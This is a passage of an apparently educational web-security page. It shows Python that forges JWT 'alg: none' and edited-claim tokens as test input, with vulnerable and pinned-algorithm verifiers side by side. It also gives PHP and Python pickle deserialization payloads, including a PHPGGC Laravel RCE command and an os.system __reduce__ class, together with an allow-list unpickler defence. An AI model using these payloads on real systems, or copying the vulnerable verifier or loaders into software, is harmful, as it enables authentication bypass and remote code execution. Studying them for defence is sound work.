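    return f"{header}.{body}.{b64url_encode(sig)}"


def strip_signature_alg_none(token, claim_changes):
    """Attack 1 from the list above, built only as test input: header says
    none, claims edited, signature segment left empty."""
    _, body, _ = token.split(".")
    claims = json.loads(b64url_decode(body))
    claims.update(claim_changes)
    header = b64url_encode(_json({"alg": "none", "typ": "JWT"}))
    return f"{header}.{b64url_encode(_json(claims))}."


def edit_claims_keep_signature(token, claim_changes):
    """Attack 3 from the list above, as test input: claims edited, original
    signature left in place."""
    header, body, sig = token.split(".")
    claims = json.loads(b64url_decode(body))
    claims.update(claim_changes)
    return f"{header}.{b64url_encode(_json(claims))}.{sig}"


def verify_vulnerable(token, secret):
    """Lets the token choose the algorithm: 'none' skips verification entirely."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(body_b64))
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def verify_safe(token, secret, expected_alg="HS256"):
    """The server fixes the algorithm; the header is untrusted input. An empty
    segment or a different alg is refused before any claim is trusted."""
    parts = token.split(".")
    if len(parts) != 3 or not all(parts):
        raise ValueError("malformed token")
    header_b64, body_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != expected_alg:
        raise ValueError("unexpected alg %r" % header.get("alg"))
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def is_rejected(verifier, token, secret):
    """True when verifier raises ValueError for the token."""
    try:
        verifier(token, secret)
    except ValueError:
        return True
    return False
```

`hmac.compare_digest` is used rather than `==` so the comparison time does not depend on how many leading signature bytes match. Pinning `expected_alg` also closes the related confusion between HMAC and RSA algorithms: a verifier that accepts whatever `alg` the header names can be handed an RS256 public key as if it were an HS256 secret. Attack 2, the weak-secret bruteforce, is not addressed by any verifier logic; it is defeated only by a long random secret.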

Deserialization Vulnerabilities

Hard

Exploiting weaknesses in the object deserialization process.

PHP Deserialization (php)
// Vulnerable code
$obj = unserialize($_GET['data']);

// If the class has magic methods like __wakeup or __destruct
// they get called automatically

// Example malicious serialized object:
O:4:"User":2:{s:4:"name";s:5:"admin";s:8:"is_admin";b:1;}

// Tools: PHPGGC for gadget chains
phpggc Laravel/RCE1 system 'id' -b
Python Pickle Deserialization (python)
import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('id',))

payload = base64.b64encode(pickle.dumps(RCE())).decode()
print(payload)

# If the application does:
# pickle.loads(base64.b64decode(user_input))
# the 'id' command will be executed
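The `__reduce__` trick works because `pickle.loads` resolves whatever global the stream names and calls it. The standard library's own answer is to subclass `pickle.Unpickler` and override `find_class` with an allow-list, so the call target is refused before it can be invoked. The Python below is an added example, not from the page: it rebuilds the payload above purely as test input, puts the vulnerable `pickle.loads` beside a restricted loader, and shows that a benign payload still round-trips while the `os.system` one is stopped at `find_class` without ever running. The allow-list contents are an assumption for the demonstration.

```python
import base64
import io
import os
import pickle


class RCE:
    """The payload class from the snippet above, reproduced only to build test input."""

    def __reduce__(self):
        return (os.system, ("id",))


def make_rce_payload():
    return base64.b64encode(pickle.dumps(RCE())).decode()


def make_benign_payload():
    """The kind of object an application might legitimately expect."""
    return base64.b64encode(pickle.dumps({"user": "guest", "role": "normal"})).decode()


def load_vulnerable(b64_data):
    """The pattern the comment above describes: os.system runs during load."""
    return pickle.loads(base64.b64decode(b64_data))


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only an explicit allow-list of globals. pickle consults
    find_class before it can call anything, so the stream's reference to
    the system() function is refused before the REDUCE opcode executes."""

    ALLOWED = {  # assumed allow-list; keep it to the types the app really needs
        ("builtins", "set"),
        ("builtins", "frozenset"),
        ("collections", "OrderedDict"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def load_restricted(b64_data):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(b64_data))).load()


def is_blocked(b64_data):
    """True when the restricted loader refuses the payload."""
    try:
        load_restricted(b64_data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("benign payload loads:", load_restricted(make_benign_payload()))
    print("rce payload blocked: ", is_blocked(make_rce_payload()))
```

The dict in the benign payload needs no global at all under the current protocol, which is why such a small allow-list suffices for it; every additional entry is a potential gadget, so the list should grow only with the application's real needs. When the data crossing the boundary is untrusted, the stronger position is not to accept pickle from it in the first place and use a data-only format such as JSON.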